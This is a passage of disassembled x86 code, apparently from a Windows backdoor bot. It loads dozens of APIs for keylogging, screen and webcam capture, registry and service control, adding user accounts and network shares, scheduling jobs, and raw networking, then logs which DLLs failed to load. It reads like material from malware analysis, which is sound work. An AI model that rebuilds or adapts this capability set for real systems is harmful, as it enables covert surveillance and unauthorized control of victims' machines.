cmp dword_43A33C, ebx
jz short loc_4063C3
cmp dword_43A4D4, ebx
jz short loc_4063C3
cmp dword_43A320, ebx
jz short loc_4063C3
cmp eax, ebx
jnz short loc_4063CD
loc_4063C3: ; CODE XREF: sub_4061D5+1B8�j
; sub_4061D5+1C0�j ...
mov dword_43A500, 1
loc_4063CD: ; CODE XREF: sub_4061D5+1EC�j
push offset aGetasynckeysta ; "GetAsyncKeyState"
push edi
call esi ; GetProcAddress
push offset aGetkeystate ; "GetKeyState"
push edi
mov dword_43A340, eax
call esi ; GetProcAddress
push offset aGetwindowtexta ; "GetWindowTextA"
push edi
mov dword_43A4C4, eax
call esi ; GetProcAddress
push offset aGetforegroundw ; "GetForegroundWindow"
push edi
mov dword_43A350, eax
call esi ; GetProcAddress
cmp dword_43A340, ebx
mov dword_43A360, eax
jz short loc_40642A
cmp dword_43A4C4, ebx
jz short loc_40642A
cmp dword_43A350, ebx
jz short loc_40642A
cmp eax, ebx
jnz short loc_406434
jmp short loc_40642A
; ---------------------------------------------------------------------------
loc_40641F: ; CODE XREF: sub_4061D5+144�j
call dword_422004 ; RtlGetLastWin32Error
mov dword_43A504, eax
loc_40642A: ; CODE XREF: sub_4061D5+232�j
; sub_4061D5+23A�j ...
mov dword_43A500, 1
loc_406434: ; CODE XREF: sub_4061D5+246�j
push offset aAdvapi32_dll ; "advapi32.dll"
call ebp ; GetModuleHandleA
mov edi, eax
cmp edi, ebx
jz loc_4065CF
push offset aRegopenkeyexa ; "RegOpenKeyExA"
push edi
call esi ; GetProcAddress
push offset aRegcreatekeyex ; "RegCreateKeyExA"
push edi
mov dword_43A4D0, eax
call esi ; GetProcAddress
push offset aRegsetvalueexa ; "RegSetValueExA"
push edi
mov dword_43A3E8, eax
call esi ; GetProcAddress
push offset aRegqueryvaluee ; "RegQueryValueExA"
push edi
mov dword_43A380, eax
call esi ; GetProcAddress
push offset aRegdeletevalue ; "RegDeleteValueA"
push edi
mov dword_43A358, eax
call esi ; GetProcAddress
push offset aRegclosekey ; "RegCloseKey"
push edi
mov dword_43A3DC, eax
call esi ; GetProcAddress
cmp dword_43A4D0, ebx
mov dword_43A480, eax
jz short loc_4064BF
cmp dword_43A3E8, ebx
jz short loc_4064BF
cmp dword_43A380, ebx
jz short loc_4064BF
cmp dword_43A358, ebx
jz short loc_4064BF
cmp dword_43A3DC, ebx
jz short loc_4064BF
cmp eax, ebx
jnz short loc_4064C9
loc_4064BF: ; CODE XREF: sub_4061D5+2C4�j
; sub_4061D5+2CC�j ...
mov dword_43A508, 1
loc_4064C9: ; CODE XREF: sub_4061D5+2E8�j
push offset aOpenprocesstok ; "OpenProcessToken"
push edi
call esi ; GetProcAddress
push offset aLookupprivileg ; "LookupPrivilegeValueA"
push edi
mov dword_43A4DC, eax
call esi ; GetProcAddress
push offset aAdjusttokenpri ; "AdjustTokenPrivileges"
push edi
mov dword_43A4C0, eax
call esi ; GetProcAddress
cmp dword_43A4DC, ebx
mov dword_43A408, eax
jz short loc_406504
cmp dword_43A4C0, ebx
jz short loc_406504
cmp eax, ebx
jnz short loc_40650E
loc_406504: ; CODE XREF: sub_4061D5+321�j
; sub_4061D5+329�j
mov dword_43A508, 1
loc_40650E: ; CODE XREF: sub_4061D5+32D�j
push offset aOpenscmanagera ; "OpenSCManagerA"
push edi
call esi ; GetProcAddress
push offset aOpenservicea ; "OpenServiceA"
push edi
mov dword_43A460, eax
call esi ; GetProcAddress
push offset aStartservicea ; "StartServiceA"
push edi
mov dword_43A4E0, eax
call esi ; GetProcAddress
push offset aControlservice ; "ControlService"
push edi
mov dword_43A468, eax
call esi ; GetProcAddress
push offset aDeleteservice ; "DeleteService"
push edi
mov dword_43A484, eax
call esi ; GetProcAddress
push offset aCloseserviceha ; "CloseServiceHandle"
push edi
mov dword_43A390, eax
call esi ; GetProcAddress
push offset aEnumservicesst ; "EnumServicesStatusA"
push edi
mov dword_43A3CC, eax
call esi ; GetProcAddress
push offset aIsvalidsecurit ; "IsValidSecurityDescriptor"
push edi
mov dword_43A470, eax
call esi ; GetProcAddress
cmp dword_43A460, ebx
mov dword_43A49C, eax
jz short loc_4065B2
cmp dword_43A4E0, ebx
jz short loc_4065B2
cmp dword_43A468, ebx
jz short loc_4065B2
cmp dword_43A484, ebx
jz short loc_4065B2
cmp dword_43A390, ebx
jz short loc_4065B2
cmp dword_43A3CC, ebx
jz short loc_4065B2
cmp dword_43A470, ebx
jz short loc_4065B2
cmp eax, ebx
jnz short loc_4065BC
loc_4065B2: ; CODE XREF: sub_4061D5+3A7�j
; sub_4061D5+3AF�j ...
mov dword_43A508, 1
loc_4065BC: ; CODE XREF: sub_4061D5+3DB�j
push offset aGetusernamea ; "GetUserNameA"
push edi
call esi ; GetProcAddress
cmp eax, ebx
mov dword_43A430, eax
jnz short loc_4065E4
jmp short loc_4065DA
; ---------------------------------------------------------------------------
loc_4065CF: ; CODE XREF: sub_4061D5+26A�j
call dword_422004 ; RtlGetLastWin32Error
mov dword_43A50C, eax
loc_4065DA: ; CODE XREF: sub_4061D5+3F8�j
mov dword_43A508, 1
loc_4065E4: ; CODE XREF: sub_4061D5+3F6�j
push offset aGdi32_dll ; "gdi32.dll"
call ebp ; GetModuleHandleA
mov edi, eax
cmp edi, ebx
jz loc_4066B0
push offset aCreatedca ; "CreateDCA"
push edi
call esi ; GetProcAddress
push offset aCreatedibsecti ; "CreateDIBSection"
push edi
mov dword_43A4E4, eax
call esi ; GetProcAddress
push offset aCreatecompatib ; "CreateCompatibleDC"
push edi
mov dword_43A4B4, eax
call esi ; GetProcAddress
push offset aGetdevicecaps ; "GetDeviceCaps"
push edi
mov dword_43A418, eax
call esi ; GetProcAddress
push offset aGetdibcolortab ; "GetDIBColorTable"
push edi
mov dword_43A410, eax
call esi ; GetProcAddress
push offset aSelectobject ; "SelectObject"
push edi
mov dword_43A458, eax
call esi ; GetProcAddress
push offset aBitblt ; "BitBlt"
push edi
mov dword_43A32C, eax
call esi ; GetProcAddress
push offset aDeletedc ; "DeleteDC"
push edi
mov dword_43A428, eax
call esi ; GetProcAddress
push offset aDeleteobject ; "DeleteObject"
push edi
mov dword_43A3C8, eax
call esi ; GetProcAddress
cmp dword_43A4E4, ebx
mov dword_43A41C, eax
jz short loc_4066BB
cmp dword_43A4B4, ebx
jz short loc_4066BB
cmp dword_43A418, ebx
jz short loc_4066BB
cmp dword_43A410, ebx
jz short loc_4066BB
cmp dword_43A458, ebx
jz short loc_4066BB
cmp dword_43A32C, ebx
jz short loc_4066BB
cmp dword_43A428, ebx
jz short loc_4066BB
cmp dword_43A3C8, ebx
jz short loc_4066BB
cmp eax, ebx
jnz short loc_4066C5
jmp short loc_4066BB
; ---------------------------------------------------------------------------
loc_4066B0: ; CODE XREF: sub_4061D5+41A�j
call dword_422004 ; RtlGetLastWin32Error
mov dword_43A514, eax
loc_4066BB: ; CODE XREF: sub_4061D5+49B�j
; sub_4061D5+4A3�j ...
mov dword_43A510, 1
loc_4066C5: ; CODE XREF: sub_4061D5+4D7�j
mov ebp, dword_422088
push offset aWs2_32_dll ; "ws2_32.dll"
call ebp ; LoadLibraryA
mov edi, eax
cmp edi, ebx
jz loc_406981
push offset aWsastartup ; "WSAStartup"
push edi
call esi ; GetProcAddress
push offset aWsasocketa ; "WSASocketA"
push edi
mov dword_43A3AC, eax
call esi ; GetProcAddress
push offset aWsaasyncselect ; "WSAAsyncSelect"
push edi
mov dword_43A314, eax
call esi ; GetProcAddress
push offset a__wsafdisset ; "__WSAFDIsSet"
push edi
mov dword_43A42C, eax
call esi ; GetProcAddress
push offset aWsaioctl ; "WSAIoctl"
push edi
mov dword_43A3F4, eax
call esi ; GetProcAddress
push offset aWsagetlasterro ; "WSAGetLastError"
push edi
mov dword_43A478, eax
call esi ; GetProcAddress
push offset aWsacleanup ; "WSACleanup"
push edi
mov dword_43A45C, eax
call esi ; GetProcAddress
push offset aSocket ; "socket"
push edi
mov dword_43A4BC, eax
call esi ; GetProcAddress
push offset aIoctlsocket ; "ioctlsocket"
push edi
mov dword_43A39C, eax
call esi ; GetProcAddress
push offset aConnect ; "connect"
push edi
mov dword_43A334, eax
call esi ; GetProcAddress
push offset aInet_ntoa ; "inet_ntoa"
push edi
mov dword_43A34C, eax
call esi ; GetProcAddress
push offset aInet_addr ; "inet_addr"
push edi
mov dword_43A420, eax
call esi ; GetProcAddress
push offset aHtons ; "htons"
push edi
mov dword_43A414, eax
call esi ; GetProcAddress
push offset aHtonl ; "htonl"
push edi
mov dword_43A4F4, eax
call esi ; GetProcAddress
push offset aNtohs ; "ntohs"
push edi
mov dword_43A4CC, eax
call esi ; GetProcAddress
push offset aNtohl ; "ntohl"
push edi
mov dword_43A498, eax
call esi ; GetProcAddress
push offset aSend ; "send"
push edi
mov dword_43A474, eax
call esi ; GetProcAddress
push offset aSendto ; "sendto"
push edi
mov dword_43A438, eax
call esi ; GetProcAddress
push offset aRecv ; "recv"
push edi
mov dword_43A36C, eax
call esi ; GetProcAddress
push offset aRecvfrom ; "recvfrom"
push edi
mov dword_43A304, eax
call esi ; GetProcAddress
mov dword_43A328, eax
push offset aBind ; "bind"
push edi
call esi ; GetProcAddress
push offset aSelect ; "select"
push edi
mov dword_43A47C, eax
call esi ; GetProcAddress
push offset aListen ; "listen"
push edi
mov dword_43A448, eax
call esi ; GetProcAddress
push offset aAccept ; "accept"
push edi
mov dword_43A4C8, eax
call esi ; GetProcAddress
push offset aSetsockopt ; "setsockopt"
push edi
mov dword_43A35C, eax
call esi ; GetProcAddress
push offset aGetsockname ; "getsockname"
push edi
mov dword_43A3B8, eax
call esi ; GetProcAddress
push offset aGethostname ; "gethostname"
push edi
mov dword_43A308, eax
call esi ; GetProcAddress
push offset aGethostbyname ; "gethostbyname"
push edi
mov dword_43A4B8, eax
call esi ; GetProcAddress
push offset aGethostbyaddr ; "gethostbyaddr"
push edi
mov dword_43A400, eax
call esi ; GetProcAddress
push offset aGetpeername ; "getpeername"
push edi
mov dword_43A494, eax
call esi ; GetProcAddress
push offset aClosesocket ; "closesocket"
push edi
mov dword_43A3E0, eax
call esi ; GetProcAddress
cmp dword_43A3AC, ebx
mov dword_43A4B0, eax
jz loc_40698C
cmp dword_43A314, ebx
jz loc_40698C
cmp dword_43A42C, ebx
jz loc_40698C
cmp dword_43A478, ebx
jz loc_40698C
cmp dword_43A45C, ebx
jz loc_40698C
cmp dword_43A4BC, ebx
jz loc_40698C
cmp dword_43A39C, ebx
jz loc_40698C
cmp dword_43A334, ebx
jz loc_40698C
cmp dword_43A34C, ebx
jz loc_40698C
cmp dword_43A420, ebx
jz loc_40698C
cmp dword_43A414, ebx
jz loc_40698C
cmp dword_43A4F4, ebx
jz loc_40698C
cmp dword_43A4CC, ebx
jz loc_40698C
cmp dword_43A498, ebx
jz short loc_40698C
cmp dword_43A438, ebx
jz short loc_40698C
cmp dword_43A36C, ebx
jz short loc_40698C
cmp dword_43A304, ebx
jz short loc_40698C
cmp dword_43A328, ebx
jz short loc_40698C
cmp dword_43A47C, ebx
jz short loc_40698C
cmp dword_43A448, ebx
jz short loc_40698C
cmp dword_43A4C8, ebx
jz short loc_40698C
cmp dword_43A35C, ebx
jz short loc_40698C
cmp dword_43A3B8, ebx
jz short loc_40698C
cmp dword_43A308, ebx
jz short loc_40698C
cmp dword_43A4B8, ebx
jz short loc_40698C
cmp dword_43A400, ebx
jz short loc_40698C
cmp dword_43A494, ebx
jz short loc_40698C
cmp eax, ebx
jnz short loc_406996
jmp short loc_40698C
; ---------------------------------------------------------------------------
loc_406981: ; CODE XREF: sub_4061D5+501�j
call dword_422004 ; RtlGetLastWin32Error
mov dword_43A51C, eax
loc_40698C: ; CODE XREF: sub_4061D5+6A0�j
; sub_4061D5+6AC�j ...
mov dword_43A518, 1
loc_406996: ; CODE XREF: sub_4061D5+7A8�j
push offset aWininet_dll ; "wininet.dll"
call ebp ; LoadLibraryA
mov edi, eax
cmp edi, ebx
jz loc_406A9B
push offset aInternetgetcon ; "InternetGetConnectedState"
push edi
call esi ; GetProcAddress
push offset aInternetgetc_0 ; "InternetGetConnectedStateEx"
push edi
mov dword_43A318, eax
call esi ; GetProcAddress
push offset aHttpopenreques ; "HttpOpenRequestA"
push edi
mov dword_43A4F0, eax
call esi ; GetProcAddress
push offset aHttpsendreques ; "HttpSendRequestA"
push edi
mov dword_43A3C4, eax
call esi ; GetProcAddress
push offset aInternetconnec ; "InternetConnectA"
push edi
mov dword_43A4EC, eax
call esi ; GetProcAddress
push offset aInternetopena ; "InternetOpenA"
push edi
mov dword_43A3D4, eax
call esi ; GetProcAddress
push offset aInternetopenur ; "InternetOpenUrlA"
push edi
mov dword_43A338, eax
call esi ; GetProcAddress
push offset aInternetcracku ; "InternetCrackUrlA"
push edi
mov dword_43A3A4, eax
call esi ; GetProcAddress
push offset aInternetreadfi ; "InternetReadFile"
push edi
mov dword_43A310, eax
call esi ; GetProcAddress
push offset aInternetcloseh ; "InternetCloseHandle"
push edi
mov dword_43A450, eax
call esi ; GetProcAddress
cmp dword_43A318, ebx
mov ecx, dword_43A338
mov dword_43A3FC, eax
jz short loc_406A77
cmp dword_43A4F0, ebx
jz short loc_406A77
cmp dword_43A3C4, ebx
jz short loc_406A77
cmp dword_43A4EC, ebx
jz short loc_406A77
cmp dword_43A3D4, ebx
jz short loc_406A77
cmp ecx, ebx
jz short loc_406A77
cmp dword_43A3A4, ebx
jz short loc_406A77
cmp dword_43A310, ebx
jz short loc_406A77
cmp dword_43A450, ebx
jz short loc_406A77
cmp eax, ebx
jnz short loc_406A81
loc_406A77: ; CODE XREF: sub_4061D5+860�j
; sub_4061D5+868�j ...
mov dword_43A520, 1
loc_406A81: ; CODE XREF: sub_4061D5+8A0�j
cmp ecx, ebx
jz short loc_406AB6
push ebx
push ebx
push ebx
push ebx
push offset aMozilla4_0Comp ; "Mozilla/4.0 (compatible)"
call ecx ; InternetOpenA
cmp eax, ebx
mov dword_43A4E8, eax
jnz short loc_406AB6
jmp short loc_406AB0
; ---------------------------------------------------------------------------
loc_406A9B: ; CODE XREF: sub_4061D5+7CC�j
call dword_422004 ; RtlGetLastWin32Error
mov dword_43A524, eax
mov dword_43A520, 1
loc_406AB0: ; CODE XREF: sub_4061D5+8C4�j
mov dword_43A4E8, ebx
loc_406AB6: ; CODE XREF: sub_4061D5+8AE�j
; sub_4061D5+8C2�j
push offset aIcmp_dll ; "icmp.dll"
call ebp ; LoadLibraryA
mov edi, eax
cmp edi, ebx
jz short loc_406B00
push offset aIcmpcreatefile ; "IcmpCreateFile"
push edi
call esi ; GetProcAddress
push offset aIcmpclosehandl ; "IcmpCloseHandle"
push edi
mov dword_43A3F0, eax
call esi ; GetProcAddress
push offset aIcmpsendecho ; "IcmpSendEcho"
push edi
mov dword_43A424, eax
call esi ; GetProcAddress
cmp dword_43A3F0, ebx
mov dword_43A48C, eax
jz short loc_406B0B
cmp dword_43A424, ebx
jz short loc_406B0B
cmp eax, ebx
jnz short loc_406B15
jmp short loc_406B0B
; ---------------------------------------------------------------------------
loc_406B00: ; CODE XREF: sub_4061D5+8EC�j
call dword_422004 ; RtlGetLastWin32Error
mov dword_43A52C, eax
loc_406B0B: ; CODE XREF: sub_4061D5+91B�j
; sub_4061D5+923�j ...
mov dword_43A528, 1
loc_406B15: ; CODE XREF: sub_4061D5+927�j
push offset aNetapi32_dll ; "netapi32.dll"
call ebp ; LoadLibraryA
mov edi, eax
cmp edi, ebx
jz loc_406C0B
push offset aNetshareadd ; "NetShareAdd"
push edi
call esi ; GetProcAddress
push offset aNetsharedel ; "NetShareDel"
push edi
mov dword_43A384, eax
call esi ; GetProcAddress
push offset aNetshareenum ; "NetShareEnum"
push edi
mov dword_43A3A0, eax
call esi ; GetProcAddress
push offset aNetschedulejob ; "NetScheduleJobAdd"
push edi
mov dword_43A4A4, eax
call esi ; GetProcAddress
push offset aNetapibufferfr ; "NetApiBufferFree"
push edi
mov dword_43A348, eax
call esi ; GetProcAddress
push offset aNetremotetod ; "NetRemoteTOD"
push edi
mov dword_43A3D8, eax
call esi ; GetProcAddress
push offset aNetuseradd ; "NetUserAdd"
push edi
mov dword_43A30C, eax
call esi ; GetProcAddress
push offset aNetuserdel ; "NetUserDel"
push edi
mov dword_43A368, eax
call esi ; GetProcAddress
push offset aNetuserenum ; "NetUserEnum"
push edi
mov dword_43A46C, eax
call esi ; GetProcAddress
push offset aNetusergetinfo ; "NetUserGetInfo"
push edi
mov dword_43A37C, eax
call esi ; GetProcAddress
push offset aNetmessagebuff ; "NetMessageBufferSend"
push edi
mov dword_43A388, eax
call esi ; GetProcAddress
cmp dword_43A384, ebx
mov dword_43A3B0, eax
jz short loc_406C16
cmp dword_43A3A0, ebx
jz short loc_406C16
cmp dword_43A4A4, ebx
jz short loc_406C16
cmp dword_43A348, ebx
jz short loc_406C16
cmp dword_43A3D8, ebx
jz short loc_406C16
cmp dword_43A30C, ebx
jz short loc_406C16
cmp dword_43A368, ebx
jz short loc_406C16
cmp dword_43A46C, ebx
jz short loc_406C16
cmp dword_43A37C, ebx
jz short loc_406C16
cmp dword_43A388, ebx
jz short loc_406C16
cmp eax, ebx
jnz short loc_406C20
jmp short loc_406C16
; ---------------------------------------------------------------------------
loc_406C0B: ; CODE XREF: sub_4061D5+94B�j
call dword_422004 ; RtlGetLastWin32Error
mov dword_43A534, eax
loc_406C16: ; CODE XREF: sub_4061D5+9E6�j
; sub_4061D5+9EE�j ...
mov dword_43A530, 1
loc_406C20: ; CODE XREF: sub_4061D5+A32�j
push offset aDnsapi_dll ; "dnsapi.dll"
call ebp ; LoadLibraryA
mov edi, eax
cmp edi, ebx
jz short loc_406C55
push offset aDnsflushresolv ; "DnsFlushResolverCache"
push edi
call esi ; GetProcAddress
push offset aDnsflushreso_0 ; "DnsFlushResolverCacheEntry_A"
push edi
mov dword_43A488, eax
call esi ; GetProcAddress
cmp dword_43A488, ebx
mov dword_43A404, eax
jz short loc_406C60
cmp eax, ebx
jnz short loc_406C6A
jmp short loc_406C60
; ---------------------------------------------------------------------------
loc_406C55: ; CODE XREF: sub_4061D5+A56�j
call dword_422004 ; RtlGetLastWin32Error
mov dword_43A53C, eax
loc_406C60: ; CODE XREF: sub_4061D5+A78�j
; sub_4061D5+A7E�j
mov dword_43A538, 1
loc_406C6A: ; CODE XREF: sub_4061D5+A7C�j
push offset aIphlpapi_dll ; "iphlpapi.dll"
call ebp ; LoadLibraryA
mov edi, eax
cmp edi, ebx
jz short loc_406C9F
push offset aGetipnettable ; "GetIpNetTable"
push edi
call esi ; GetProcAddress
push offset aDeleteipnetent ; "DeleteIpNetEntry"
push edi
mov dword_43A3A8, eax
call esi ; GetProcAddress
cmp dword_43A3A8, ebx
mov dword_43A40C, eax
jz short loc_406CAA
cmp eax, ebx
jnz short loc_406CB4
jmp short loc_406CAA
; ---------------------------------------------------------------------------
loc_406C9F: ; CODE XREF: sub_4061D5+AA0�j
call dword_422004 ; RtlGetLastWin32Error
mov dword_43A544, eax
loc_406CAA: ; CODE XREF: sub_4061D5+AC2�j
; sub_4061D5+AC8�j
mov dword_43A540, 1
loc_406CB4: ; CODE XREF: sub_4061D5+AC6�j
push offset aMpr_dll ; "mpr.dll"
call ebp ; LoadLibraryA
mov edi, eax
cmp edi, ebx
jz short loc_406D13
push offset aWnetaddconnect ; "WNetAddConnection2A"
push edi
call esi ; GetProcAddress
push offset aWnetaddconne_0 ; "WNetAddConnection2W"
push edi
mov dword_43A444, eax
call esi ; GetProcAddress
push offset aWnetcancelconn ; "WNetCancelConnection2A"
push edi
mov dword_43A4D8, eax
call esi ; GetProcAddress
push offset aWnetcancelco_0 ; "WNetCancelConnection2W"
push edi
mov dword_43A378, eax
call esi ; GetProcAddress
cmp dword_43A444, ebx
mov dword_43A330, eax
jz short loc_406D1E
cmp dword_43A4D8, ebx
jz short loc_406D1E
cmp dword_43A378, ebx
jz short loc_406D1E
cmp eax, ebx
jnz short loc_406D28
jmp short loc_406D1E
; ---------------------------------------------------------------------------
loc_406D13: ; CODE XREF: sub_4061D5+AEA�j
call dword_422004 ; RtlGetLastWin32Error
mov dword_43A54C, eax
loc_406D1E: ; CODE XREF: sub_4061D5+B26�j
; sub_4061D5+B2E�j ...
mov dword_43A548, 1
loc_406D28: ; CODE XREF: sub_4061D5+B3A�j
push offset aShell32_dll ; "shell32.dll"
call ebp ; LoadLibraryA
mov edi, eax
cmp edi, ebx
jz short loc_406D5D
push offset aShellexecutea ; "ShellExecuteA"
push edi
call esi ; GetProcAddress
push offset aShchangenotify ; "SHChangeNotify"
push edi
mov dword_43A4AC, eax
call esi ; GetProcAddress
cmp dword_43A4AC, ebx
mov dword_43A370, eax
jz short loc_406D68
cmp eax, ebx
jnz short loc_406D72
jmp short loc_406D68
; ---------------------------------------------------------------------------
loc_406D5D: ; CODE XREF: sub_4061D5+B5E�j
call dword_422004 ; RtlGetLastWin32Error
mov dword_43A554, eax
loc_406D68: ; CODE XREF: sub_4061D5+B80�j
; sub_4061D5+B86�j
mov dword_43A550, 1
loc_406D72: ; CODE XREF: sub_4061D5+B84�j
push offset aOdbc32_dll ; "odbc32.dll"
call ebp ; LoadLibraryA
mov edi, eax
cmp edi, ebx
jz short loc_406DFB
push offset aSqldriverconne ; "SQLDriverConnect"
push edi
call esi ; GetProcAddress
push offset aSqlsetenvattr ; "SQLSetEnvAttr"
push edi
mov dword_43A490, eax
call esi ; GetProcAddress
push offset aSqlexecdirect ; "SQLExecDirect"
push edi
mov dword_43A354, eax
call esi ; GetProcAddress
push offset aSqlallochandle ; "SQLAllocHandle"
push edi
mov dword_43A4A8, eax
call esi ; GetProcAddress
push offset aSqlfreehandle ; "SQLFreeHandle"
push edi
mov dword_43A3C0, eax
call esi ; GetProcAddress
push offset aSqldisconnect ; "SQLDisconnect"
push edi
mov dword_43A454, eax
call esi ; GetProcAddress
cmp dword_43A490, ebx
mov dword_43A364, eax
jz short loc_406E06
cmp dword_43A354, ebx
jz short loc_406E06
cmp dword_43A4A8, ebx
jz short loc_406E06
cmp dword_43A3C0, ebx
jz short loc_406E06
cmp dword_43A454, ebx
jz short loc_406E06
cmp eax, ebx
jnz short loc_406E10
jmp short loc_406E06
; ---------------------------------------------------------------------------
loc_406DFB: ; CODE XREF: sub_4061D5+BA8�j
call dword_422004 ; RtlGetLastWin32Error
mov dword_43A55C, eax
loc_406E06: ; CODE XREF: sub_4061D5+BFE�j
; sub_4061D5+C06�j ...
mov dword_43A558, 1
loc_406E10: ; CODE XREF: sub_4061D5+C22�j
push offset aAvicap32_dll ; "avicap32.dll"
call ebp ; LoadLibraryA
mov edi, eax
cmp edi, ebx
jz short loc_406E45
push offset aCapcreatecaptu ; "capCreateCaptureWindowA"
push edi
call esi ; GetProcAddress
push offset aCapgetdriverde ; "capGetDriverDescriptionA"
push edi
mov dword_43A3D0, eax
call esi ; GetProcAddress
cmp dword_43A3D0, ebx
mov dword_43A434, eax
jz short loc_406E50
cmp eax, ebx
jnz short loc_406E5A
jmp short loc_406E50
; ---------------------------------------------------------------------------
loc_406E45: ; CODE XREF: sub_4061D5+C46�j
call dword_422004 ; RtlGetLastWin32Error
mov dword_43A564, eax
loc_406E50: ; CODE XREF: sub_4061D5+C68�j
; sub_4061D5+C6E�j
mov dword_43A560, 1
loc_406E5A: ; CODE XREF: sub_4061D5+C6C�j
pop edi
pop esi
xor eax, eax
pop ebp
inc eax
pop ebx
retn
sub_4061D5 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_406E62 proc near ; CODE XREF: sub_409806+4CB8�p
var_200 = byte ptr -200h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
sub esp, 200h
push ebx
mov ebx, [ebp+arg_4]
push esi
xor esi, esi
cmp dword_43A4F8, esi
push edi
mov edi, [ebp+arg_8]
jz short loc_406EAA
push dword_43A4FC
lea eax, [ebp+var_200]
push offset aKernel32_dllFa ; "Kernel32.dll failed. <%d>"
push eax
call sub_416905
push esi
push edi
lea eax, [ebp+var_200]
push eax
push ebx
push [ebp+arg_0]
call sub_405D20
add esp, 20h
loc_406EAA: ; CODE XREF: sub_406E62+1A�j
cmp dword_43A500, esi
jz short loc_406EDE
push dword_43A504
lea eax, [ebp+var_200]
push offset aUser32_dllFail ; "User32.dll failed. <%d>"
push eax
call sub_416905
push esi
push edi
lea eax, [ebp+var_200]
push eax
push ebx
push [ebp+arg_0]
call sub_405D20
add esp, 20h
loc_406EDE: ; CODE XREF: sub_406E62+4E�j
cmp dword_43A508, esi
jz short loc_406F12
push dword_43A50C
lea eax, [ebp+var_200]
push offset aAdvapi32_dllFa ; "Advapi32.dll failed. <%d>"
push eax
call sub_416905
push esi
push edi
lea eax, [ebp+var_200]
push eax
push ebx
push [ebp+arg_0]
call sub_405D20
add esp, 20h
loc_406F12: ; CODE XREF: sub_406E62+82�j
cmp dword_43A510, esi
jz short loc_406F46
push dword_43A514
lea eax, [ebp+var_200]
push offset aGdi32_dllFaile ; "Gdi32.dll failed. <%d>"
push eax
call sub_416905
push esi
push edi
lea eax, [ebp+var_200]
push eax
push ebx
push [ebp+arg_0]
call sub_405D20
add esp, 20h
loc_406F46: ; CODE XREF: sub_406E62+B6�j
cmp dword_43A518, esi
jz short loc_406F7A
push dword_43A51C
lea eax, [ebp+var_200]
push offset aWs2_32_dllFail ; "Ws2_32.dll failed. <%d>"
push eax
call sub_416905
push esi
push edi
lea eax, [ebp+var_200]
push eax
push ebx
push [ebp+arg_0]
call sub_405D20
add esp, 20h
loc_406F7A: ; CODE XREF: sub_406E62+EA�j
cmp dword_43A520, esi
jz short loc_406FAE
push dword_43A524
lea eax, [ebp+var_200]
push offset aWininet_dllFai ; "Wininet.dll failed. <%d>"
push eax
call sub_416905
push esi
push edi
lea eax, [ebp+var_200]
push eax
push ebx
push [ebp+arg_0]
call sub_405D20
add esp, 20h
loc_406FAE: ; CODE XREF: sub_406E62+11E�j
cmp dword_43A528, esi
jz short loc_406FE2
push dword_43A52C
lea eax, [ebp+var_200]
push offset aIcmp_dllFailed ; "Icmp.dll failed. <%d>"
push eax
call sub_416905
push esi
push edi
lea eax, [ebp+var_200]
push eax
push ebx
push [ebp+arg_0]
call sub_405D20
add esp, 20h
loc_406FE2: ; CODE XREF: sub_406E62+152�j
cmp dword_43A530, esi
jz short loc_407016
push dword_43A534
lea eax, [ebp+var_200]
push offset aNetapi32_dllFa ; "Netapi32.dll failed. <%d>"
push eax
call sub_416905
push esi
push edi
lea eax, [ebp+var_200]
push eax
push ebx
push [ebp+arg_0]
call sub_405D20
add esp, 20h
loc_407016: ; CODE XREF: sub_406E62+186�j
cmp dword_43A538, esi
jz short loc_40704A
push dword_43A53C
lea eax, [ebp+var_200]
push offset aDnsapi_dllFail ; "Dnsapi.dll failed. <%d>"
push eax
call sub_416905
push esi
push edi
lea eax, [ebp+var_200]
push eax
push ebx
push [ebp+arg_0]
call sub_405D20
add esp, 20h
loc_40704A: ; CODE XREF: sub_406E62+1BA�j
cmp dword_43A540, esi
jz short loc_40707E
push dword_43A544
lea eax, [ebp+var_200]
push offset aIphlpapi_dllFa ; "Iphlpapi.dll failed. <%d>"
push eax
call sub_416905
push esi
push edi
lea eax, [ebp+var_200]
push eax
push ebx
push [ebp+arg_0]
call sub_405D20
loc_40707B: ; DATA XREF: .text:00431804�o
; .text:00431818�o ...
add esp, 20h
loc_40707E: ; CODE XREF: sub_406E62+1EE�j
cmp dword_43A548, esi
jz short loc_4070B2
push dword_43A54C
lea eax, [ebp+var_200]
push offset aMpr32_dllFaile ; "Mpr32.dll failed. <%d>"
push eax
call sub_416905
push esi
push edi
lea eax, [ebp+var_200]
push eax
push ebx
push [ebp+arg_0]
call sub_405D20
add esp, 20h
loc_4070B2: ; CODE XREF: sub_406E62+222�j
cmp dword_43A550, esi
jz short loc_4070E6
push dword_43A554
lea eax, [ebp+var_200]
push offset aShell32_dllFai ; "Shell32.dll failed. <%d>"
push eax
call sub_416905
push esi
push edi
lea eax, [ebp+var_200]
push eax
push ebx
push [ebp+arg_0]
call sub_405D20
add esp, 20h
loc_4070E6: ; CODE XREF: sub_406E62+256�j
cmp dword_43A558, esi
jz short loc_40711A
push dword_43A55C
lea eax, [ebp+var_200]
push offset aOdbc32_dllFail ; "Odbc32.dll failed. <%d>"
push eax
call sub_416905
push esi
push edi
lea eax, [ebp+var_200]
push eax
push ebx
push [ebp+arg_0]
call sub_405D20
add esp, 20h
loc_40711A: ; CODE XREF: sub_406E62+28A�j
cmp dword_43A560, esi
jz short loc_40714E
push dword_43A564
lea eax, [ebp+var_200]
push offset aAvicap32_dllFa ; "Avicap32.dll failed. <%d>"
push eax
call sub_416905
push esi
push edi
lea eax, [ebp+var_200]
push eax
push ebx
push [ebp+arg_0]
call sub_405D20
add esp, 20h
loc_40714E: ; CODE XREF: sub_406E62+2BE�j
lea eax, [ebp+var_200]
push offset aMainDllTestCom ; "[MAIN]: DLL test complete."
push eax
call sub_416905
cmp [ebp+arg_C], esi
pop ecx
pop ecx
jnz short loc_40717B
push esi
push edi
lea eax, [ebp+var_200]
push eax
push ebx
push [ebp+arg_0]
call sub_405D20
add esp, 14h
loc_40717B: ; CODE XREF: sub_406E62+302�j
lea eax, [ebp+var_200]
push eax
call sub_401ECD
pop ecx
pop edi
pop esi
pop ebx
leave
retn
sub_406E62 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40718D proc near ; CODE XREF: sub_409806+A61�p
; sub_409806+A94�p ...
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
push esi
push edi
